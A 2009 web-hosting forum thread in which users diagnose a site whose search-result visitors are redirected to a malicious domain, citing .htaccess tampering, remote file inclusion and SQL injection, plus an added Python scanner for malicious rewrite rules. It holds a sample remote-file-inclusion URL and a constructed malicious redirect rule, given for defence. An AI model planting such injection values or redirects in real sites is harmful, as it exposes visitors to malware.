slick, posted May 4, 2009

Hi. I have a website hosted at TCH. The domain name is trini-chat dot com. I've noticed lately that sometimes when I do a search for my site on Google and I click on the link it goes directly to another domain (http://europpc dot com/search.php?iw=1&links=trini+chat) and then that redirects to another site that Firefox deems dangerous. Any ideas what may be causing this? Thanks.

SteveW, posted May 5, 2009 (edited)

Look in your /public_html/.htaccess file for RewriteCond code that mentions search engine names and RewriteRule code that mentions names of sites other than yours, such as the europc site, or possibly a site that is identified only by IP address.

If you find code like this, it is a common symptom of sites that have been compromised. When visitors go to your site from search engine results, they get redirected to the malicious site. If they go straight to your site, they don't get redirected.

The .htaccess file would most likely have been changed by a malicious PHP script that the hacker "tricked" one of your .php web pages into running. It looks like many of your pages use input (query string) parameters such as "?name=Forums". When your script receives data this way, it is important that it checks it carefully to guard against something called "remote file inclusion" <- a term to do a web search on.

For example, if someone calls your page with ....filename.php?name=hxxp://someothersite.com/maliciousscript.txt, then your site, if your PHP code doesn't guard against it, will retrieve the malicious script and run it. You have to ensure that incoming values of "name" are only acted upon if they are legitimate values that you expect. Otherwise, the incoming data should be ignored.

The above is the most common reason for this type of redirection.

-----

It looks like you are using FlashChat. Look it up at http://secunia.com/advisories/search/. I know it has had some security vulnerabilities in the past, but I don't recall which ones or whether they are of a type that would be relevant to your current problem.

Edited May 5, 2009 by SteveW

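The .htaccess check SteveW describes, as an added example that is not part of the original thread: a Python scan that flags RewriteRule targets on hosts other than your own (or on bare IP addresses) together with the search-engine referrer conditions attached to them. The engine list, the function name and the sample file contents are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Search-engine names to look for in RewriteCond patterns (assumed list; extend as needed).
ENGINES = ("google", "yahoo", "bing", "msn", "aol", "ask", "altavista")
IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def scan_htaccess(text, own_hosts):
    """Return sorted (line_no, kind, detail) findings for off-site redirect rules."""
    own = {h.lower() for h in own_hosts}
    findings = []
    pending = []  # referrer conditions waiting for the RewriteRule they apply to
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            hits = [e for e in ENGINES if e in parts[2].lower()]
            if "http_referer" in parts[1].lower() and hits:
                pending.append((no, ",".join(hits)))
        elif directive == "rewriterule" and len(parts) >= 3:
            # Only absolute substitutions (http://host/...) carry a hostname.
            host = (urlparse(parts[2]).hostname or "").lower()
            if host and host not in own:
                kind = "ip-target" if IP_HOST.match(host) else "offsite-target"
                findings.append((no, kind, host))
                findings += [(n, "search-referer-cond", e) for n, e in pending]
            pending = []  # conditions only apply to the next RewriteRule
    return sorted(findings)

# Constructed sample: a referrer-conditional redirect to an IP (documentation
# range 203.0.113.0/24) followed by a legitimate same-site canonical redirect.
SAMPLE = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*
RewriteRule ^(.*)$ http://203.0.113.7/in.php?q=$1 [R=301,L]
RewriteCond %{HTTP_HOST} ^example.org$
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
"""

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, ["example.org", "www.example.org"]):
        print(finding)
```

A clean result here does not rule out a compromise: the same redirect can be injected into page files or database content instead of .htaccess.
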
slick (Author), posted May 10, 2009

.htaccess file is clean but there seems to be some strange code on the index page as well as a few other pages.

TCH-Thomas, posted May 10, 2009

I would ask the help desk to check if the account has been compromised and, as usual, change the password to the account (as strong a password as possible). As for the strange code, I would either clean it out myself or ask the help desk if it's something they can help me with, then publish the file again and see if everything works as expected.

SteveW, posted May 10, 2009

Also see Secunia about PHPNuke: http://secunia.com/advisories/search/?search=phpnuke. There was a new vulnerability found a couple of months ago. It is an "SQL injection" vulnerability that allows outsiders to inject data into a MySQL database. If you look in the text of your static code pages on the server and don't find the malicious code in the page, it could be that it's stored in the database and being retrieved by whatever process is getting data out of the db to build the output page.

It's important to keep all scripts updated to their latest versions.

JTD, posted May 11, 2009

I would personally change nuke scripts. I will PM you a site that has a VERY secure nuke script that I personally have used.